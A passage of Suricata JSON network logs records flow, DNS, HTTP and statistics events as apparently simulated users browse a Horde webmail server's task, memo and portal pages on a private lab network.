eout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22478,"memcap_state":0,"memcap_global":0},"http":{"memuse":87604,"memcap":0}}} {"timestamp":"2020-02-29T00:14:11.000286+0000","flow_id":858648459774048,"event_type":"flow","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":13,"bytes_toserver":3106,"bytes_toclient":7263,"start":"2020-02-29T00:12:30.428128+0000","end":"2020-02-29T00:13:10.761246+0000","age":40,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:11.001647+0000","flow_id":339305296184252,"event_type":"flow","src_ip":"192.168.10.122","src_port":33829,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:10.345020+0000","end":"2020-02-29T00:09:10.453617+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:11.316083+0000","flow_id":756720302109332,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34826,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6756},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":33150,"tx_id":0}} {"timestamp":"2020-02-29T00:14:13.001135+0000","flow_id":1076287324585437,"event_type":"flow","src_ip":"192.168.10.122","src_port":37956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:12.622045+0000","end":"2020-02-29T00:09:12.730774+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:15.000220+0000","event_type":"stats","stats":{"uptime":14507,"capture":{"kernel_packets":135627,"kernel_drops":0},"decoder":{"pkts":135632,"bytes":93404337,"invalid":187,"ipv4":134129,"ipv6":8,"ethernet":135632,"raw":0,"null":0,"sll":0,"tcp":128805,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1816,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2758,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21817,"memcap_state":0,"memcap_global":0},"http":{"memuse":35749,"memcap":0}}} {"timestamp":"2020-02-29T00:14:16.000255+0000","flow_id":579939444423429,"event_type":"flow","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":22,"bytes_toserver":3065,"bytes_toclient":20115,"start":"2020-02-29T00:13:07.293637+0000","end":"2020-02-29T00:13:15.784000+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:18.000797+0000","flow_id":700400392481363,"event_type":"flow","src_ip":"192.168.10.130","src_port":34816,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1095,"bytes_toclient":6515,"start":"2020-02-29T00:13:12.010835+0000","end":"2020-02-29T00:13:17.187494+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:22.000276+0000","event_type":"stats","stats":{"uptime":14514,"capture":{"kernel_packets":135627,"kernel_drops":0},"decoder":{"pkts":135632,"bytes":93404337,"invalid":187,"ipv4":134129,"ipv6":8,"ethernet":135632,"raw":0,"null":0,"sll":0,"tcp":128805,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1816,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2760,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21817,"memcap_state":0,"memcap_global":0},"http":{"memuse":35589,"memcap":0}}} {"timestamp":"2020-02-29T00:14:25.000341+0000","flow_id":875772497513137,"event_type":"flow","src_ip":"192.168.10.81","src_port":52752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1107,"start":"2020-02-29T00:13:18.871089+0000","end":"2020-02-29T00:13:24.094914+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:28.540604+0000","flow_id":645029679087548,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5997,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:28.697243+0000","flow_id":645029679087548,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51842,"proto":"UDP","dns":{"type":"answer","id":5997,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:28.697243+0000","flow_id":645029679087548,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51842,"proto":"UDP","dns":{"type":"answer","id":5997,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:28.779172+0000","flow_id":1080320319612926,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34828,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=CzzvouuXL90PtKLh7taEoDK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8792}} {"timestamp":"2020-02-29T00:14:29.000160+0000","event_type":"stats","stats":{"uptime":14521,"capture":{"kernel_packets":135627,"kernel_drops":0},"decoder":{"pkts":135632,"bytes":93404337,"invalid":187,"ipv4":134129,"ipv6":8,"ethernet":135632,"raw":0,"null":0,"sll":0,"tcp":128805,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1816,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2761,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22148,"memcap_state":0,"memcap_global":0},"http":{"memuse":86225,"memcap":0}}} {"timestamp":"2020-02-29T00:14:30.000335+0000","flow_id":1016531461094710,"event_type":"flow","src_ip":"192.168.10.130","src_port":34818,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1165,"bytes_toclient":643,"start":"2020-02-29T00:13:24.736566+0000","end":"2020-02-29T00:13:29.882017+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:33.779815+0000","flow_id":1080320319612926,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34828,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=CzzvouuXL90PtKLh7taEoDK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8792},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":35365,"tx_id":0}} {"timestamp":"2020-02-29T00:14:34.700227+0000","flow_id":959704753418051,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50181,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:34.701748+0000","flow_id":658082085123380,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33640,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36121,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:34.808864+0000","flow_id":959704753418051,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39423,"proto":"UDP","dns":{"type":"answer","id":50181,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:34.808864+0000","flow_id":959704753418051,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39423,"proto":"UDP","dns":{"type":"answer","id":50181,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:34.809817+0000","flow_id":658082085123380,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33640,"proto":"UDP","dns":{"type":"answer","id":36121,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:34.809817+0000","flow_id":658082085123380,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33640,"proto":"UDP","dns":{"type":"answer","id":36121,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:34.872848+0000","flow_id":54888288126643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752}} {"timestamp":"2020-02-29T00:14:34.914303+0000","flow_id":512302305152088,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34830,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=CzzvouuXL90PtKLh7taEoDK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:14:34.924308+0000","flow_id":209077614025364,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45522,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44440,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:35.033032+0000","flow_id":209077614025364,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45522,"proto":"UDP","dns":{"type":"answer","id":44440,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:35.033032+0000","flow_id":209077614025364,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45522,"proto":"UDP","dns":{"type":"answer","id":44440,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:36.000132+0000","event_type":"stats","stats":{"uptime":14528,"capture":{"kernel_packets":135658,"kernel_drops":0},"decoder":{"pkts":135661,"bytes":93416146,"invalid":187,"ipv4":134156,"ipv6":8,"ethernet":135661,"raw":0,"null":0,"sll":0,"tcp":128830,"udp":5124,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2778,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2794,"synack":2785,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1817,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2341,"failed_udp":112},"tx":{"http":4673,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2421}},"flow_mgr":{"closed_pruned":2762,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23140,"memcap_state":0,"memcap_global":0},"http":{"memuse":53758,"memcap":0}}} {"timestamp":"2020-02-29T00:14:37.000629+0000","flow_id":1477849603888713,"event_type":"flow","src_ip":"192.168.10.130","src_port":34820,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1912,"bytes_toclient":6507,"start":"2020-02-29T00:13:31.382537+0000","end":"2020-02-29T00:13:36.778747+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:39.874014+0000","flow_id":54888288126643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52756,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5752},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:14:39.946436+0000","flow_id":479196697555204,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45154,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12066,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:40.054421+0000","flow_id":479196697555204,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45154,"proto":"UDP","dns":{"type":"answer","id":12066,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:40.054421+0000","flow_id":479196697555204,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45154,"proto":"UDP","dns":{"type":"answer","id":12066,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:40.178979+0000","flow_id":1209336842897935,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34832,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6755}} {"timestamp":"2020-02-29T00:14:42.000716+0000","flow_id":653855817992358,"event_type":"flow","src_ip":"192.168.10.122","src_port":49092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:40.919718+0000","end":"2020-02-29T00:09:41.028314+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:43.000194+0000","event_type":"stats","stats":{"uptime":14535,"capture":{"kernel_packets":135716,"kernel_drops":0},"decoder":{"pkts":135727,"bytes":93446988,"invalid":188,"ipv4":134222,"ipv6":8,"ethernet":135727,"raw":0,"null":0,"sll":0,"tcp":128887,"udp":5132,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2781,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2797,"synack":2788,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1820,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2345,"failed_udp":112},"tx":{"http":4676,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2425}},"flow_mgr":{"closed_pruned":2763,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23140,"memcap_state":0,"memcap_global":0},"http":{"memuse":53816,"memcap":0}}} {"timestamp":"2020-02-29T00:14:44.210095+0000","flow_id":1926025151001775,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47129,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17709,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:44.318670+0000","flow_id":1926025151001775,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47129,"proto":"UDP","dns":{"type":"answer","id":17709,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:44.318670+0000","flow_id":1926025151001775,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47129,"proto":"UDP","dns":{"type":"answer","id":17709,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:44.338503+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:14:44.338503+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":18,"tx_id":0}} {"timestamp":"2020-02-29T00:14:45.000745+0000","flow_id":1943479878474362,"event_type":"flow","src_ip":"192.168.10.122","src_port":41241,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:44.645754+0000","end":"2020-02-29T00:09:44.754265+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:45.179858+0000","flow_id":1209336842897935,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34832,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6755},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":33151,"tx_id":0}} 